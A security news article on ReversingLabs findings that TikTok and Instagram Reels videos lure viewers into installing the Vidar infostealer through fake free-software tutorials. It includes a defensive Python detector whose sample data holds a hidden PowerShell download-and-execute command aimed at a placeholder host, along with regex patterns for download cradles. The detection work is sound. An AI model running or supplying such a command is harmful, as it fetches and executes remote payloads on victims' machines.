Cybercriminals are using TikTok and Instagram Reels videos to spread Vidar, an infostealer malware, through fake downloads for popular paid software, according to ReversingLabs.

The researchers uncovered two campaigns behind the activity, each using a different approach to draw in viewers before sending them to external download sites.

One campaign centered on fake software installation tutorials featuring polished graphics and voiceovers. The second built audiences through a stream of videos promoting free access to premium software before directing viewers to a central tutorial containing download instructions.

“Either approach is a means to a different end, and the differences demonstrate how attackers can leverage different aspects of social media engagement to reach more potential victims,” the researchers wrote.

Fake software tutorials deliver Vidar

The first campaign relied on a network of accounts masquerading as technology support pages. Researchers observed profiles using names such as “windows.tips” and “windows.insights,” along with blue-and-white profile images that resembled Microsoft’s branding.

[Image] Screenshot of the malicious user, showing their profile picture (Source: ReversingLabs)

The accounts posted short tutorials claiming to show users how to unlock paid software at no cost. In one example, viewers were instructed to open PowerShell from the Windows menu and run a command that supposedly unlocked Spotify Premium.

“A non-technical user does not know any better, and may assume it is legitimate. Attackers are relying on this lack of understanding,” the researchers noted.

Presented as a simple software tip, the command instead downloaded a file identified as Vidar.
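The lure above depends on a user opening PowerShell from the Start menu and pasting a command that fetches and runs a payload. From the defender's side, that leaves a recognisable trace in process-creation telemetry: an interactive PowerShell launch whose command line combines a download helper, a URL, something that executes the fetched content, and evasion switches. The following scorer is an added example, not ReversingLabs code and not a reproduction of the command used in the campaign; the process events, user names, paths and the `example.invalid` URL are constructed, and the markers and weights are assumptions meant to be tuned, not a vendor signature.

```python
"""Score interactive PowerShell launches for download-and-run behaviour.

Added example for this article, not ReversingLabs code. The events below
are constructed; the regexes and weights are assumptions to be tuned.
"""
import re
from dataclasses import dataclass

# Heuristic markers (assumption: illustrative, not a complete rule set).
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadstring|downloadfile|"
    r"net\.webclient|invoke-restmethod|\birm\b|start-bitstransfer",
    re.IGNORECASE,
)
EXEC_RE = re.compile(r"\biex\b|invoke-expression|start-process|\.exe\b", re.IGNORECASE)
EVASION_RE = re.compile(
    r"-e(nc|ncodedcommand)?\s|frombase64string|-w(indowstyle)?\s+hidden|"
    r"-nop\b|-noprofile\b|executionpolicy\s+bypass",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)

# Parents that indicate a human typed or pasted the command (Start menu, a shell).
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


@dataclass
class ProcessEvent:
    """Minimal process-creation record (shape assumed, e.g. Sysmon Event ID 1)."""
    user: str
    parent_image: str
    image: str
    command_line: str


@dataclass
class Verdict:
    score: int
    reasons: list


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev: ProcessEvent) -> Verdict:
    """Return a weighted score and the reasons; 0 for non-PowerShell images."""
    reasons, score = [], 0
    if _basename(ev.image) not in POWERSHELL_IMAGES:
        return Verdict(0, reasons)
    parent = _basename(ev.parent_image)
    if parent in INTERACTIVE_PARENTS:
        score += 1
        reasons.append(f"interactive launch from {parent}")
    cmd = ev.command_line
    if DOWNLOAD_RE.search(cmd):
        score += 2
        reasons.append("download cradle")
    if URL_RE.search(cmd):
        score += 1
        reasons.append("url in command line")
    if EXEC_RE.search(cmd):
        score += 2
        reasons.append("execution of fetched content")
    if EVASION_RE.search(cmd):
        score += 2
        reasons.append("evasion switches")
    return Verdict(score, reasons)


def triage(events, threshold: int = 5):
    """Return (user, score, reasons) for events at or above the threshold."""
    alerts = []
    for ev in events:
        v = score_event(ev)
        if v.score >= threshold:
            alerts.append((ev.user, v.score, v.reasons))
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events: one pasted lure-style command, three benign launches.
SAMPLE_EVENTS = [
    ProcessEvent("alice", r"C:\Windows\explorer.exe", PS,
                 'powershell -w hidden -nop -c "iex (iwr https://example.invalid/unlock)"'),
    ProcessEvent("bob", r"C:\Windows\explorer.exe", PS, "powershell Get-Service"),
    ProcessEvent("svc", r"C:\Program Files\Agent\agent.exe", PS,
                 "powershell -File C:\\scripts\\inventory.ps1"),
    ProcessEvent("carol", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd /c dir"),
]

if __name__ == "__main__":
    for user, score, reasons in triage(SAMPLE_EVENTS):
        print(f"ALERT user={user} score={score} reasons={reasons}")
```

Only the pasted command scores above the threshold; a scheduled script run by an agent and an interactive `Get-Service` stay below it. The interactive-parent weight is what ties this to the article's scenario: the same cradle launched by a management agent is worth a look, but a human pasting it from a "free Spotify Premium" tutorial is the case this lure produces.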

Some of the videos gained significant traction. One tutorial amassed more than 100,000 views and generated thousands of saves, shares and likes.

Saves, shares and comments carry greater weight than likes because users are more selective when using those forms of engagement, helping boost a video’s visibility in recommendation algorithms.

Vidar, first identified in 2018, is an information-stealing malware family used to collect credentials, financial information and authentication tokens from infected devices. The malware received an update in October 2025 that improved its stability and evasion capabilities. Access to the service has also been advertised through a $300 lifetime license.

Building engagement before the pitch

The second campaign took a less polished approach. The accounts posted short videos featuring services such as Spotify Premium, claiming the premium features had been unlocked for free.

Rather than providing instructions upfront, the videos encouraged viewers to leave comments or visit other posts to learn how the software had been obtained.

Users were then directed to tutorial videos, direct messages or links in account profiles that led to websites advertising free software, games and AI tools.

Some of the sites required visitors to complete surveys and navigate a series of redirects before they could access the promised downloads.

[Image] Download screen for Spotify Premium, with a list of 5 tasks to do to unlock the download (Source: ReversingLabs)

Because they were unable to complete the required surveys, the researchers could not determine the final payload delivered through the links.

A moderation challenge

Malicious videos can be difficult to contain once they begin attracting views.

“Users who catch onto the malicious intent, either through research or falling for it themselves, may try to warn others in the comments. However, most platforms allow for creators to delete comments and block commenters, so diligent attackers can snuff out this resistance.”

Reporting the content does not always result in its removal. During the investigation, attempts to report some of the videos to Instagram as scams were rejected, allowing the content to remain accessible to users.

Even when videos or accounts are removed, new accounts can quickly appear and continue posting similar content, making enforcement an ongoing challenge.

ReversingLabs has published a list of indicators of compromise (IoCs) associated with the campaigns to help defenders identify related activity.
